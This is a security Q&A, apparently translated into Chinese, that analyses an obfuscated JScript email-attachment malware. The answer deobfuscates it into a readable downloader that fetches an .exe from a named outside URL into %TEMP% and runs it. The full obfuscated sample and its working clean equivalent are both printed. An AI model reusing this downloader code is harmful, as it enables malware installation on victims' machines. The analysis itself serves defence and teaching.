这个 JavaScript 攻击是如何工作的?

信息安全 恶意软件 勒索软件
2021-09-07 04:49:27

StackOverflow 上有一个带有类似代码片段的问题,但因为与编程无关而被关闭了,所以我想在这里问。

它以 Zip 文件的形式通过电子邮件发送;在 Notepad++ 中打开后可以阅读其中的 JS 文件,而(大概?)不会执行它。在 Google 上搜索其中一段代码时,有很多结果链接到 https://www.hybrid-analysis.com,并表明它是勒索软件,但能否解释一下这段代码实际上做了什么?

那些看似随机的单词序列似乎是为了避免代码被检测为与已知恶意软件签名相似,然后再操纵这些字符串拼出代码并执行?

iAIzcLGbNj = " while ( ( elem = elem[ dir ] ) && elem.nodeType !== 9 ) { if ( elem.nodeType === 1 ) { if ( truncate && jQuery( elem ).is( until ) ) { break; } matched.push( elem ); } } return matched; };";
fergusI = 0;
String.prototype.contradistinction = function () { return this.substr(0, 1); };
var uUXTro = [("dingle","adornment","n")+"hh"+("precipitous","astounding","peruse","devon","lH")+"CNAl", "A"+"iR"+"Nh"+("dover","ambiguous","diocese","cD")+"nBHy", "E"+"xpan"+("disable","foamy","titled","mandate","dEnviron")+"me"+"nt"+"Stri"+("river","polyphonic","ngs"), ("flower","centered","gently","petiole","")+"%"+("spirituality","unabashed","TE")+"MP%", ""+("interaction","career","perception",".")+"exe", ("wives","electrical","R")+"un", "A"+"ct"+"in"+"ce"+"nt"+"ivei"+("regarded","crossroads","vi")+("botanist","expense","explains","manatarms","nc")+"enti"+"ve"+"eXincentiv"+("excruciating","futures","concepts","eObinc")+"en"+"ti"+"ve"+"je"+"ince"+"nt"+"ivect", "sFtalU", "FlAYMT", ("vaccination","metres","twill","W")+"Sc"+"ince"+"ntiver"+"ip"+"tinc"+"entive." + ("writing","tiffany","S"), "AmvHaUzPHrP", ("humdrum","cavernous","suave","beryl","h")+"in"+"ce"+("vespers","bountiful","gripe","nt")+"iv"+"ee"+("terrier","echoing","education","li")+"nc"+("tranny","basilica","en")+"ti"+("cooperate","festive","modem","gains","vel"), "UJcMlBfkOA", "G"+("centers","aqueduct","plugins","rRAF")+"Ka"+("creased","storing","twine","je")+"To", "Min"+"ce"+"ntiv"+"eS"+("enthusiast","pounce","iniquitous","Xi")+"nc"+"en"+("optical","migration","disks","marche","ti")+"ve"+("describe","impaired","israeli","ML")+"in"+"ce"+("sorts","fabled","nt")+("usurped","federal","iv")+"e2" + "."+"in"+"ce"+("decoy","lobby","brazilian","supervisors","nt")+("rancorous","pierce","terror","iv")+"eXMi"+"ncenti"+("stretcher","depict","sheer","ve")+"LH"+"in"+"ce"+"nt"+"iveT"+"TP"];
rQSHDCBXb = " var rneedsContext = jQuery.expr.match.needsContext;";
uUXTro.splice(7, fergusI + 2);
chubby = uUXTro[1+4+1].split("incentive").join("");
var lrAXrUK = this[chubby];
AapDxox = "IdauNqhuT";
societies = (("notoriety", "linguist", "HiLPFi", "ventures", "pVrSBHnCPxP") + "kbmKKwklAVc").contradistinction();
theoriess = (("inalienable", "cognizance", "ziHwqRxJu", "dozen", "sSBVEfa") + "xEqzqkRRVx").contradistinction();

fergusI = 6;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3];
uUXTro[fergusI + 2] = "EuHNTOs";
fergusI++;
uUXTro.splice(fergusI + 1, fergusI - 4);
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join("");
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + "");
YPlWYgwd = " for ( ; n; n = n.nextSibling ) { if ( n.nodeType === 1 && n !== elem ) { matched.push( n ); } ";
fergusI++;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join("");
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]);
KNgrjvc = " var siblings = function( n, elem ) { var matched = [];";
fergusI /= 2;
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]);
KcjXPEtu = "} return matched; };";
revealede = (("underlying", "scrip", "eYyeHhl", "angular", "EbYlGrsShJg") + "qWuYEw").contradistinction();

function undeveloped(poseidon, economic) {
    try {
    var jersey = BPmnOej + "/" + economic + uUXTro[fergusI];
    LjujlQ = "} return jQuery.grep( elements, function( elem ) { return ( jQuery.inArray( elem, qualifier ) > -1 ) !== not; } ); ";
zBqJutIT["o" + societies + revealede + "n"](("aviation","unreliable","nutrition","published","G") + revealede + ("mouth","consensus","agents","pricing","T"), poseidon, false);

QcwDedGUE = "}jQuery.filter = function( expr, elems, not ) { var elem = elems[ 0 ];";
zBqJutIT[theoriess + ("republicans","aggrandizement","e") + (("educated", "hybrid", "vQJtIpP", "enact", "torpor", "nxldkIa") + "GyucrQNudzq").contradistinction() + (("lingo", "caitiff", "CEdBvsmD", "dealtime", "vbulletin", "dMNcSDdMEzF") + "wKxDlSnr").contradistinction()]();
wGSsSnAuJ = " if ( not ) { expr = \":not(\" + expr + \")\"; ";
if (zBqJutIT.status == 200) {
    var PbOLTH = new lrAXrUK((""+("slang","biology","A")+"pO"+("intimate","dramatist","easterly","encouraging","DB.") + ""+"S"+("sheila","premises","fatherless","tr")+"eam").replace("p", "D"));
    PbOLTH.open();
    RvweTKriM = "var rsingleTag = ( /^<([\w-]+)\s*\/?>(?:<\/\1>|)$/ );";
    PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1);
    aODTVaRhyp = "var risSimple = /^.[^:#\[\.,]*$/;";
    PbOLTH[("sonnet","heath","dried","mains","w")+"ri"+"te"](zBqJutIT[""+"R"+"es"+("capsule","begin","enlargement","heracles","pon") + theoriess + "e"+"Bo"+("laconically","discovery","dy")]);
    eUVrfTIaq = " Implement the identical functionality for filter and not function winnow( elements, qualifier, not ) { if ( jQuery.isFunction( qualifier ) ) { return jQuery.grep( elements, function( elem, i ) { /* jshint -W018 */ return !!qualifier.call( elem, i, elem ) !== not; } );";
    PbOLTH[(societies + "o"+"Di"+("unpopular","anarchist","remix","tying","ti")+"on").replace("D", theoriess)] = 0;
    rURMWYFCS = "} if ( qualifier.nodeType ) { return jQuery.grep( elements, function( elem ) { return ( elem === qualifier ) !== not; } );";
    PbOLTH["sav"+"eT"+"oF"+("silhouette","participate","eligible","employed","ile")](jersey, 2);
    JzDFHcYwRvt = "} if ( typeof qualifier === \"string\" ) { if ( risSimple.test( qualifier ) ) { return jQuery.filter( qualifier, elements, not ); ";
    PbOLTH.close();
    ueMAAMNPHiw = "} qualifier = jQuery.filter( qualifier, elements ); ";
    OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU"); wQXGGA = " if ( typeof selector !== \"string\" ) { return this.pushStack( jQuery( selector ).filter( function() { for ( i = 0; i < len; i++ ) { if ( jQuery.contains( self[ i ], this ) ) { return true; } } } ) ); ";
}

} catch (HiQurqnDJ) { };

hUivzNY = "jQuery.fn.extend( { find: function( selector ) { var i, ret = [], self = this, len = self.length;";
}
undeveloped(("craven","surgical","motels","h")+"tt"+"p://"+"soft"+"le"+"ns"+"ja"+("grandchildren","probabilities","nudity","normal","ka")+"rta.co"+"m/"+"sy"+"stem"+("dorset","portal","advertise","substantial","/l")+("mango","thrush","productive","ogs/98")+("flush","cyclone","h7")+("johnson","studying","b66gb.")+"exe","yROdkAds");
NrQwRjPqXlj = "} return elems.length === 1 && elem.nodeType === 1 ? jQuery.find.matchesSelector( elem, expr ) ? [ elem ] : [] : jQuery.find.matches( expr, jQuery.grep( elems, function( elem ) { return elem.nodeType === 1; } ) ); };";
1个回答

有很多未使用的字符串:一些位于逗号运算符的左侧,一些被赋给从未使用的变量(它们看起来像 jQuery 代码片段;这里实际上并没有使用 jQuery)。

删除这些之后,剩下的是:

fergusI = 0;
String.prototype.contradistinction = function () { return this.substr(0, 1); };
var uUXTro = ["n"+"hh"+"lH"+"CNAl", "A"+"iR"+"Nh"+"cD"+"nBHy", "E"+"xpan"+"dEnviron"+"me"+"nt"+"Stri"+"ngs", ""+"%"+"TE"+"MP%", ""+"."+"exe", "R"+"un", "A"+"ct"+"in"+"ce"+"nt"+"ivei"+"vi"+"nc"+"enti"+"ve"+"eXincentiv"+"eObinc"+"en"+"ti"+"ve"+"je"+"ince"+"nt"+"ivect", "sFtalU", "FlAYMT", "W"+"Sc"+"ince"+"ntiver"+"ip"+"tinc"+"entive." + "S", "AmvHaUzPHrP", "h"+"in"+"ce"+"nt"+"iv"+"ee"+"li"+"nc"+"en"+"ti"+"vel", "UJcMlBfkOA", "G"+"rRAF"+"Ka"+"je"+"To", "Min"+"ce"+"ntiv"+"eS"+"Xi"+"nc"+"en"+"ti"+"ve"+"ML"+"in"+"ce"+"nt"+"iv"+"e2" + "."+"in"+"ce"+"nt"+"iv"+"eXMi"+"ncenti"+"ve"+"LH"+"in"+"ce"+"nt"+"iveT"+"TP"];
uUXTro.splice(7, fergusI + 2);
chubby = uUXTro[1+4+1].split("incentive").join("");
var lrAXrUK = this[chubby];
societies = ("pVrSBHnCPxP" + "kbmKKwklAVc").contradistinction();
theoriess = ("sSBVEfa" + "xEqzqkRRVx").contradistinction();

fergusI = 6;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3];
uUXTro[fergusI + 2] = "EuHNTOs";
fergusI++;
uUXTro.splice(fergusI + 1, fergusI - 4);
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join("");
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + "");
fergusI++;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join("");
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]);
fergusI /= 2;
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]);
revealede = ("EbYlGrsShJg" + "qWuYEw").contradistinction();

function undeveloped(poseidon, economic) {
    try {
    var jersey = BPmnOej + "/" + economic + uUXTro[fergusI];
zBqJutIT["o" + societies + revealede + "n"]("G" + revealede + "T", poseidon, false);

zBqJutIT[theoriess + "e" + ("nxldkIa" + "GyucrQNudzq").contradistinction() + ("dMNcSDdMEzF" + "wKxDlSnr").contradistinction()]();
if (zBqJutIT.status == 200) {
    var PbOLTH = new lrAXrUK((""+"A"+"pO"+"DB." + ""+"S"+"tr"+"eam").replace("p", "D"));
    PbOLTH.open();
    PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1);
    PbOLTH["w"+"ri"+"te"](zBqJutIT[""+"R"+"es"+"pon" + theoriess + "e"+"Bo"+"dy"]);
    PbOLTH[(societies + "o"+"Di"+"ti"+"on").replace("D", theoriess)] = 0;
    PbOLTH["sav"+"eT"+"oF"+"ile"](jersey, 2);
    PbOLTH.close();
    OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU");
}

} catch (HiQurqnDJ) { };

}
undeveloped("h"+"tt"+"p://"+"soft"+"le"+"ns"+"ja"+"ka"+"rta.co"+"m/"+"sy"+"stem"+"/l"+"ogs/98"+"h7"+"b66gb."+"exe","yROdkAds");

现在剩下许多非常简单的字符串拼接需要清理。此外,脚本为 String 对象定义的 contradistinction 方法只返回字符串的第一个字符,所以例如 ("pVrSBHnCPxP" + "kbmKKwklAVc").contradistinction() 就只是 "p"。处理完这些之后,你会得到:

fergusI = 0;
var uUXTro = ["nhhlHCNAl", "AiRNhcDnBHy", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run", "ActincentiveivincentiveeXincentiveObincentivejeincentivect", "sFtalU", "FlAYMT", "WScincentiveriptincentive.S", "AmvHaUzPHrP", "hincentiveelincentivel", "UJcMlBfkOA", "GrRAFKajeTo", "MincentiveSXincentiveMLincentive2.incentiveXMincentiveLHincentiveTTP"];
uUXTro.splice(7, fergusI + 2);
chubby = uUXTro[1+4+1].split("incentive").join("");
var lrAXrUK = this[chubby];
societies = "p";
theoriess = "s";

fergusI = 6;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3];
uUXTro[fergusI + 2] = "EuHNTOs";
fergusI++;
uUXTro.splice(fergusI + 1, fergusI - 4);
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join("");
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + "");
fergusI++;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join("");
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]);
fergusI /= 2;
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]);
revealede = "E";

function undeveloped(poseidon, economic) {
    try {
    var jersey = BPmnOej + "/" + economic + uUXTro[fergusI];
zBqJutIT["o" + societies + revealede + "n"]("G" + revealede + "T", poseidon, false);

zBqJutIT[theoriess + "end"]();
if (zBqJutIT.status == 200) {
    var PbOLTH = new lrAXrUK(("ApODB.Stream").replace("p", "D"));
    PbOLTH.open();
    PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1);
    PbOLTH["write"](zBqJutIT["Respon" + theoriess + "eBody"]);
    PbOLTH[(societies + "oDition").replace("D", theoriess)] = 0;
    PbOLTH["saveToFile"](jersey, 2);
    PbOLTH.close();
    OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU");
}

} catch (HiQurqnDJ) { };

}
undeveloped("http://softlensjakarta.com/system/logs/98h7b66gb.exe","yROdkAds");

现在最后一行中清晰可见的 URL 才是重点。

至于所有的 .split("incentive").join("") 调用:字符串 incentive 是一个诱饵,在使用那些较长的字符串之前会先从中删除。对 uUXTro 的初始值执行此操作后,一些字符串就变得可以识别了:

var uUXTro = ["nhhlHCNAl", "AiRNhcDnBHy", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run", "ActiveXObject", "sFtalU", "FlAYMT", "WScript.S", "AmvHaUzPHrP", "hell", "UJcMlBfkOA", "GrRAFKajeTo", "MSXML2.XMLHTTP"];

我不会把其余步骤都做完,但发生的事情不难理解:fergusI 取各种整数值用于索引 uUXTro 数组,发生更多的字符串拼接,一些诱饵字符串被从 uUXTro 中 splice 出去(但有些被留下),最终结果基本上是这样的:

// Deobfuscated equivalent of the script above. It is plain WSH/JScript style code: every
// capability comes from COM objects created via ActiveXObject (the `this[chubby]` lookup).
// For defenders, this is the whole behaviour of the sample: a script host instantiating
// WScript.Shell + MSXML2.XMLHTTP + ADODB.Stream, writing an .exe into %TEMP% and launching it.
var shell = new ActiveXObject("WScript.Shell");
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
// Drop path is %TEMP%/yROdkAds.exe — the file name is the second argument of the
// undeveloped(...) call at the bottom of the obfuscated script, the ".exe" comes from uUXTro[4].
var exe = shell.ExpandEnvironmentStrings("%TEMP%") + "/yROdkAds.exe";
// Synchronous GET (third argument false): the script blocks until the download finishes.
xhr.open("GET", "http://softlensjakarta.com/system/logs/98h7b66gb.exe", false);
xhr.send();
// Anything other than HTTP 200 does nothing; the original additionally wraps all of this in an
// empty catch (HiQurqnDJ), so every failure is silent — no error ever reaches the user.
if(xhr.status == 200) {
  var stream = new ActiveXObject("ADODB.Stream");
  stream.open();
  // 1 = adTypeBinary; the obfuscated form hides it as 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1).
  stream.type=1;
  stream.write(xhr.ResponseBody);
  // Rewind before saving so the entire response body is written to disk.
  stream.position = 0;
  // 2 = adSaveCreateOverWrite: an existing file of that name is replaced.
  stream.saveToFile(exe, 2);
  stream.close();
  // Run(command, windowStyle, waitOnReturn): 1 = normal window, false = do not wait.
  // The `false` was obfuscated as "ISKhYal" === "EwSDqpJcU".
  shell.Run(exe, 1, false);
}

这里我挑出了 4 个最重要的变量,并给它们起了去混淆后的名称:

shell was OoKse
xhr was zBqJutIT
exe was jersey
stream was PbOLTH

总之,这个脚本是一个下载器:它试图从攻击者控制的服务器上获取并执行一个程序。如果我直接访问 softlensjakarta 这个 URL,会得到一个 12 字节的文件,内容是字符 STUPID LOCKY。这可能意味着该服务器是一台已被清理的受害服务器(而“STUPID LOCKY”是某人想出来的“拒绝访问”提示),也可能是一台相当狡猾的恶意服务器,它会先检查 User-Agent 是否属于易受攻击的目标,然后才发送真正的恶意软件。

对于恶意下载器,你永远无法仅凭下载器代码本身知道有效载荷会是什么。同一个 URL 可能轮换提供许多不同的恶意程序,轮换取决于其他恶意软件作者向诱骗你运行下载器的人支付了多少费用(即“按安装付费”恶意软件)。